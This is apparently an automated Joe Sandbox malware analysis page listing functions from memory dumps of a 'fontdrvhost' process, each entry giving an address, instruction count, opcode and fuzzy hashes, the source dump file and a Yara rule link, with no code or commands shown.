Opcode ID: ebb395aaacfe57c9ceb47faf084787742ecb707b3bb00c6db52b3347ee9b88a8
Instruction ID: 1e941edfc2c7b8dc374795c5940f8ea590d9ef28be3726aaa4ef67e41c530607
Opcode Fuzzy Hash: ebb395aaacfe57c9ceb47faf084787742ecb707b3bb00c6db52b3347ee9b88a8
Instruction Fuzzy Hash: 15C1CE3061A54A9BFB2DCF64C0A05B937A1FF45300B5546BDC88B8B69FCA38E582CB41

Function 00007FFD9BC9946F Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d597de22f0714df5a8c346523e733ed2a8cd9e578228ff0edb82d54a691947c0
Instruction ID: d8f598c38ad001e85a30f24cdfb8815fce137907fb6e7eabe247cc3011e6641b
Opcode Fuzzy Hash: d597de22f0714df5a8c346523e733ed2a8cd9e578228ff0edb82d54a691947c0
Instruction Fuzzy Hash: 41C1DE3061A54A8BEB2DCF64C0E85B937A1FF45300B5545BDC88BCB69FCA78E981CB41

Function 00007FFD9BC93952 Relevance: .3, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69fa0b91442e8f78066f076fad40dc345d70b12fc63e794754003807f36ee0c1
Instruction ID: 418829450df977460fa8344091ff262d03e7433e5adc403e558e4c9f4d583365
Opcode Fuzzy Hash: 69fa0b91442e8f78066f076fad40dc345d70b12fc63e794754003807f36ee0c1
Instruction Fuzzy Hash: 96C1F430719A4A8FE759DB68C4A16A8B7A1FF85300F4541BED04EC7ADBCB28F951C780

Function 00007FFD9BC98D02 Relevance: .3, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 540b5ea2912a11acb3780b4061777f18ae311d991e023bdf36affaa5c367d39a
Instruction ID: 91f6492b1acf4d0e7c53a28877c3fd0659182938219d2885a0f9f57c7a26e94d
Opcode Fuzzy Hash: 540b5ea2912a11acb3780b4061777f18ae311d991e023bdf36affaa5c367d39a
Instruction Fuzzy Hash: C2C10730B0E94A8FF759DB64C4A16A8B7A1FF59340F554179C04EC7AAACB28F951C780

Function 00007FFD9BC96767 Relevance: .3, Instructions: 302COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a1a4c6ff0a4fe26eaa4863907cc7f50a88d18a32e82a116a283bc05d2b9dddc
Instruction ID: b0e5d21fb1c0df2d45a88d98846139efc9af4a04fc141852e87c67404fbd7e61
Opcode Fuzzy Hash: 2a1a4c6ff0a4fe26eaa4863907cc7f50a88d18a32e82a116a283bc05d2b9dddc
Instruction Fuzzy Hash: D921D351F0E16A86F73926B928351BC26408F503A5F1701B7F46E860EBDC4C2A452382

Function 00007FFD9BC9B881 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a089290813c3423da655ae17c4ba542f2defa67459bfd7a2fcbecde14b532eb0
Instruction ID: ebef9646f7cd2893795f1482d57507a205123ac06aaf6613e250f7d42dfa6477
Opcode Fuzzy Hash: a089290813c3423da655ae17c4ba542f2defa67459bfd7a2fcbecde14b532eb0
Instruction Fuzzy Hash: F621F252F0E19BA6F73D56B568355BC37409F41220F1A05BAD44E460EFEC4C3A819292

Function 00007FFD9BC98246 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc2b30705d050e8037fc89ded79116f6c2199ab78b92c4575a548ed670339911
Instruction ID: d143599c6d929406d1f49d778b35f19c7ef4f60b48c931b3352c33e6b8250ff2
Opcode Fuzzy Hash: cc2b30705d050e8037fc89ded79116f6c2199ab78b92c4575a548ed670339911
Instruction Fuzzy Hash: C2816731B1EA4A4FF3389A7894254BD77E0FF45391B16057ED08ED31ABDE28B9028751

Function 00007FFD9BC92E86 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c5edfed9ce48a4d40060a756de4a27b855cf2c22302f1ebe52ea0f77a6bb681
Instruction ID: 94465536670f8d9515dd4be6a9c8464a5f3de1574305ed3ca7e376aa69f811c5
Opcode Fuzzy Hash: 7c5edfed9ce48a4d40060a756de4a27b855cf2c22302f1ebe52ea0f77a6bb681
Instruction Fuzzy Hash: DF815731B0E64A4FF33D9AA8946547D77E0EF95350B16047EE48FC72ABDE28B9028741

Function 00007FFD9BC96FDB Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b2e3cf7eee0e95a34746d60041a375d7b69e24fa8cfc04bc8f9175e2b3de6f6
Instruction ID: 84d6f42be8ddcabacf9913bdf818518cfb9037d9368cc5b090301e549f5aeeb8
Opcode Fuzzy Hash: 2b2e3cf7eee0e95a34746d60041a375d7b69e24fa8cfc04bc8f9175e2b3de6f6
Instruction Fuzzy Hash: AE719030E1A54E8FFB69DBB48865ABCBBB1FF45340F5105BAD00ED71E9DB2869418701

Function 00007FFD9BC9C0FB Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ceb0431f7660410840969ae9c48a950bcc996975a9d66315bb92e6b68bae6642
Instruction ID: ce4d0d61347c6ad575a6c617c3e69511fccbec8415e224eda500b380ed0e774c
Opcode Fuzzy Hash: ceb0431f7660410840969ae9c48a950bcc996975a9d66315bb92e6b68bae6642
Instruction Fuzzy Hash: AA71A431E1D94E8EF765DBB888656BDBBB1FF45301F5100BAD00ED71EADA286A41C701

Function 00007FFD9BDCD342 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2939565054.00007FFD9BDC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bdc0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f624ab06d2bf7faee869abe82c192578addc3e000da410c3942d87959bd31a9
Instruction ID: 777b7d1c4b140ef9f59472ac5b8ed87e78849853e80e1daac3802c858cb3b42d
Opcode Fuzzy Hash: 6f624ab06d2bf7faee869abe82c192578addc3e000da410c3942d87959bd31a9
Instruction Fuzzy Hash: 6D61A330B19E094FE799FB3C8869A7533D2EB993057154979D01DC32EADE39EC828741

Function 00007FFD9BC91012 Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ab32285e4414046a90b946a458667e5012b56e0848a11feca7a32bb252cfce0
Instruction ID: 0128413454fccbc5095b71b3ec85a5e6b1e0d1fe2a2c1986074d6689a6f5370b
Opcode Fuzzy Hash: 9ab32285e4414046a90b946a458667e5012b56e0848a11feca7a32bb252cfce0
Instruction Fuzzy Hash: 32510535B0E48D6FF778DA6888675BC77D0FF44310B0602B9D09EC75BADE18AA068741

Function 00007FFD9BC96442 Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0e47da4ad3a36c3c23faa3ebb399631b9b94106ffcc4e54c3c1b246e1f83826
Instruction ID: 8fddcbaffd95dcf9d4f6c438204fb659b7be3c87f61ec12c670237c2eb9aef47
Opcode Fuzzy Hash: d0e47da4ad3a36c3c23faa3ebb399631b9b94106ffcc4e54c3c1b246e1f83826
Instruction Fuzzy Hash: C6510471A0E44D4FF778DA6888669BC77D0EF54350B0602B9F09EC75FEDD18AA068781

Function 00007FFD9BC997E0 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8223fdab6afc3d2360a6f1e388286d20b5f248e39385bdbcb8aa5e45842fa8cb
Instruction ID: 2dc451b8e9425687f4dd258f2670d5f7d4cfc57017c5b63ea306ca4b8b48405b
Opcode Fuzzy Hash: 8223fdab6afc3d2360a6f1e388286d20b5f248e39385bdbcb8aa5e45842fa8cb
Instruction Fuzzy Hash: E2511230E1D95E4BFBA89B6884796BCB7A1FF51300F4541BEC09EC729ADD386A818741

Function 00007FFD9BC91BAB Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79105e3ba1c1d032d608e9486d0cf947fad29d95c4119fbdd5f6ab0a855615d3
Instruction ID: 05fe1a604160fc08c308287b77f9763dd15b7107a266cabff7da084defa01acc
Opcode Fuzzy Hash: 79105e3ba1c1d032d608e9486d0cf947fad29d95c4119fbdd5f6ab0a855615d3
Instruction Fuzzy Hash: C751A030E1964EAFEB65DBB488665FCBBB1FF19300F5104B9D05ED71A9DA286A42C700

Function 00007FFD9B8A090D Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c542246fee0866028fd52a33a3dde153e23cc3bc29b7681b0b57ea0834a60f4
Instruction ID: 17e720db762cbbbdb0da8460848f40ad9e61f2270843c64bad51d4bb9a9da091
Opcode Fuzzy Hash: 0c542246fee0866028fd52a33a3dde153e23cc3bc29b7681b0b57ea0834a60f4
Instruction Fuzzy Hash: C0412722B1D96D4EE71DB7AC74A96F977C1DF49324F0404BBD00EC71E7ED28A8428284

Function 00007FFD9BC95707 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc2c36d61d1023e5e7eca40ed69357c31c618882ccea4ad7491fd56affb204c1
Instruction ID: c989dbb01fce2e89e764fc3576573fdaceb2db48e1ab1dbbe119752f208e1180
Opcode Fuzzy Hash: fc2c36d61d1023e5e7eca40ed69357c31c618882ccea4ad7491fd56affb204c1
Instruction Fuzzy Hash: B741623160CA488FDF9CEF28D4A5AA477E1FB6831070545AAD04EC7296DE21F985CB81

Function 00007FFD9BC9AAB7 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 441d1f3fe28419aa17d2b71d405b8d2d8ce358418993b58929097b08394e02a1
Instruction ID: e353309f0e325ba93f78919b006d11b83e29d8cb02ddb35e0baad6094c29179d
Opcode Fuzzy Hash: 441d1f3fe28419aa17d2b71d405b8d2d8ce358418993b58929097b08394e02a1
Instruction Fuzzy Hash: 6541643260C9488FDF9CEF68C4A5DA873E1FBA831071511AAD04FC71A6DE25F945CB81

Function 00007FFD9BC957B1 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22ed55b3e83332494d791185ddf0947d7c89d4a01831f75b0bbe9834fa6d8171
Instruction ID: 60e16419dcc42a9d79b98c1fbf35fad41eee999b01850ba54e357eac2a1557e5
Opcode Fuzzy Hash: 22ed55b3e83332494d791185ddf0947d7c89d4a01831f75b0bbe9834fa6d8171
Instruction Fuzzy Hash: B331823160CA488FDB9CEF28C4A5E6477E1FB6831070546AED45EC72A6DE25FC85CB81

Function 00007FFD9BC9AB61 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cde2be25ad948d4d6b1b7432e5947c427186ff4674b7fa33e60bc594c4b96e84
Instruction ID: 18286913393ec76f3835a813d4d05b3e0b0781006ed0ca8504c208843be9f276
Opcode Fuzzy Hash: cde2be25ad948d4d6b1b7432e5947c427186ff4674b7fa33e60bc594c4b96e84
Instruction Fuzzy Hash: 7A31813160C9488FDB9DEF28C4A5E6473E1FBA831071505AED05BC71A6DE25F845CB81

Function 00007FFD9B8A0908 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3d7e5f302a88f8ec2398e6a7592314a031dcba88df827417dd45c6b7d3b22c7
Instruction ID: 8f0ad7c45b02b83b038004b2c57ba88b8e14885f4337ba5d9f3c74c307c3e55b
Opcode Fuzzy Hash: c3d7e5f302a88f8ec2398e6a7592314a031dcba88df827417dd45c6b7d3b22c7
Instruction Fuzzy Hash: FE21F83130DC194FE768EB4CE899DB973D1EB5932131105BAE58AC7136D911EC9287C1

Function 00007FFD9BC9574B Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c3863233176a05b2a7d99ba23e932e3bd70fd3bd9e9f5568783cd7a4e16b784
Instruction ID: 95a1c07d5a519b8052f4ba72c60df95f31183b467c722a746e87e53c214e0713
Opcode Fuzzy Hash: 0c3863233176a05b2a7d99ba23e932e3bd70fd3bd9e9f5568783cd7a4e16b784
Instruction Fuzzy Hash: 10318F3160CA49CFDB9CEF28C4A5EA477E1FB6831070545AAD04EC72A6DE25F885CB81

Function 00007FFD9BC9AAFB Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c90285d54177c256fc3bd96b4ea4421f3cebf09bfa8b180beef71e575475b235
Instruction ID: ba1c1cad6a541d8fab28ef4f8f08396142bc6f5f166129faa29b7d81ad0b1883
Opcode Fuzzy Hash: c90285d54177c256fc3bd96b4ea4421f3cebf09bfa8b180beef71e575475b235
Instruction Fuzzy Hash: 5F31803160C9488FDF9CEF28C4A5EA4B3E2FBA831071505ADD04BC72A6DE25F845CB81

Function 00007FFD9BDCD581 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2939565054.00007FFD9BDC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bdc0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5124217a8fe5e8b44774738cb7b6fdd378b44c6a47f3b7277b9a54b37704a40
Instruction ID: ef714fb37bf3e2cb0acfa6e7d461e4dfaaf063d9a58850976ffde2bc18c91309
Opcode Fuzzy Hash: a5124217a8fe5e8b44774738cb7b6fdd378b44c6a47f3b7277b9a54b37704a40
Instruction Fuzzy Hash: 2421E512B2E98E4FE77DA6A818601746B91FF5934476510F7D04FC71D6EE186E068350

Function 00007FFD9BC9288B Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d11c8e87062927649e8091a754b840c43a1ca9bd1e2ee420bff30e8efc5c4997
Instruction ID: 022ae68512b7e277c0fe7eca1df6d0ead3f831083f032a2c20fdd99f154bd284
Opcode Fuzzy Hash: d11c8e87062927649e8091a754b840c43a1ca9bd1e2ee420bff30e8efc5c4997
Instruction Fuzzy Hash: C9314571B1990E9FEB68DB98C4A19BCB3A1FF55710B124139D05DD7296CF24BD12C780

Function 00007FFD9BC95515 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c4425e42c0f5d613edf54fb8754de9b7885e1c5ecd2d9d84d3af0a4b3fae594
Instruction ID: b7d838544fc956263e20e6da8353e93131f3b2dd97d8fb7675d7939b1e958004
Opcode Fuzzy Hash: 4c4425e42c0f5d613edf54fb8754de9b7885e1c5ecd2d9d84d3af0a4b3fae594
Instruction Fuzzy Hash: DD311C70E1E64ECFFBA8DBA484655BD77B2FF54300F52017AD40ED61A6DA38BA408B41

Function 00007FFD9BC97C4B Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd5a4aebcc4636892df4b34d6dfb0565eaa800c3f6dab3931040aeaa13db67d1
Instruction ID: c55ab73e8169b2049f83e0f56920caf4b400c74d6dd3f7634adce3bdde44c3ba
Opcode Fuzzy Hash: fd5a4aebcc4636892df4b34d6dfb0565eaa800c3f6dab3931040aeaa13db67d1
Instruction Fuzzy Hash: 34317271B1A90E9FEB68EE68C4A19BCB3A1FF54710B15413AD05EC7296CF24BD11C784

Function 00007FFD9B8A0C25 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a44afb55f9157f56b5c7aee45c30e6ee636279c8bbe1f18a47cd8326562b1aa
Instruction ID: a658ea66d71cce0f062124aae3d8cf27ec3ea841368201ec666151689d101434
Opcode Fuzzy Hash: 6a44afb55f9157f56b5c7aee45c30e6ee636279c8bbe1f18a47cd8326562b1aa
Instruction Fuzzy Hash: 16315932B1E65D8FE726A7A898651EC7760EF46324F0542F3D00CCB1D3E93826468761

Function 00007FFD9BC9A8C5 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57f6a1d563de438e7bf89e9e509663a96f7c122cfc777a9572d046f0c1466aef
Instruction ID: 7dbb91d8295822d345ea947ca24276381f54854fa7b81dd319a80b07e3d45c75
Opcode Fuzzy Hash: 57f6a1d563de438e7bf89e9e509663a96f7c122cfc777a9572d046f0c1466aef
Instruction Fuzzy Hash: C9315C34A1E55ECFEBA8DBA484616BD77B1FF44300F5300BAE42ED65A5DF38AA408741

Function 00007FFD9B8A1171 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 609b503b7ef520bbf1c1f0b447333ffb40d273bc2b6f9a4896e4761521b4a021
Instruction ID: b42878499d36ee01c661d7fe88041b4068e2248b1778007112529f716d098c87
Opcode Fuzzy Hash: 609b503b7ef520bbf1c1f0b447333ffb40d273bc2b6f9a4896e4761521b4a021
Instruction Fuzzy Hash: 1D319130A0D68E8FDB56EBA4CC649A97FF0FF5A300B0905FBD009D71A3DA28A944C751

Function 00007FFD9B8A0998 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a8da33c24e56b1298b89439b8624fa711e1ce420ada8c5213a23ee11a2dac26
Instruction ID: f1398c7ca6f40b4fee5c33102a323bfac3c9b518926e9abd67933b2fc33785eb
Opcode Fuzzy Hash: 2a8da33c24e56b1298b89439b8624fa711e1ce420ada8c5213a23ee11a2dac26
Instruction Fuzzy Hash: FC210720B29D6D0FE79CF76C946A675B6C2EB9C715F4100B9E40EC32E6EC24EC414251

Function 00007FFD9BC94400 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84374c9141f7c6206172ed5d1b22a6e81e4b657dd709ace39786ad3dea95c622
Instruction ID: 8a33fb6364ec530e56489d803e5a9cef1bd0f6a4b0abdf7aa387626fe12b3114
Opcode Fuzzy Hash: 84374c9141f7c6206172ed5d1b22a6e81e4b657dd709ace39786ad3dea95c622
Instruction Fuzzy Hash: 1B314B10A5E5DA9BF739826844709B97F61EF5131171986BED0DB8B0EFC81CBA85C341

Function 00007FFD9BC9BD29 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa43d1499fd6d17984c076d2433db2c339b265e6362ef7679afae6238df3de2f
Instruction ID: 7fc13100e17dbf5d84044a6270ae6a7eeb3432c6e37eaf132c5ac27c680368a9
Opcode Fuzzy Hash: aa43d1499fd6d17984c076d2433db2c339b265e6362ef7679afae6238df3de2f
Instruction Fuzzy Hash: 8A314A35E1A91D9FEBA8DB6884A1BEDB7B1FB58300F0000BDD00EE3295CE356A418B00

Function 00007FFD9BC90CD1 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91c1f0134b89e1a2727bb1979f40c77363fa167379090d99bcc1c64b6d1539fe
Instruction ID: 74009f6d040229aba87b2b86090b2df2964465a8d2b103237c79debc77b16dd0
Opcode Fuzzy Hash: 91c1f0134b89e1a2727bb1979f40c77363fa167379090d99bcc1c64b6d1539fe
Instruction Fuzzy Hash: FA21DD31E1DA4E9FDBA5DFA8C8605FDBBB1FF58B00F51017AD00AE32A5DA256A01C740

Function 00007FFD9BC997B0 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d836e23e74b4e69e77602ffedb857dc0c72f3ad3c524dd8c063b8f1355dc858
Instruction ID: 15285eb56a678688a90b21bec446114cb9922652303644c4ffbcfb34f8ca492a
Opcode Fuzzy Hash: 0d836e23e74b4e69e77602ffedb857dc0c72f3ad3c524dd8c063b8f1355dc858
Instruction Fuzzy Hash: 1F312910A1E59A4BF739836844785B87B91EF52301F1A45BEC08BCB6AFC86CBA818351

Function 00007FFD9BC97D1E Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ce41b87d711e598a53133db35bf3ebd717a7dd2a5b6b56dae18634578229720
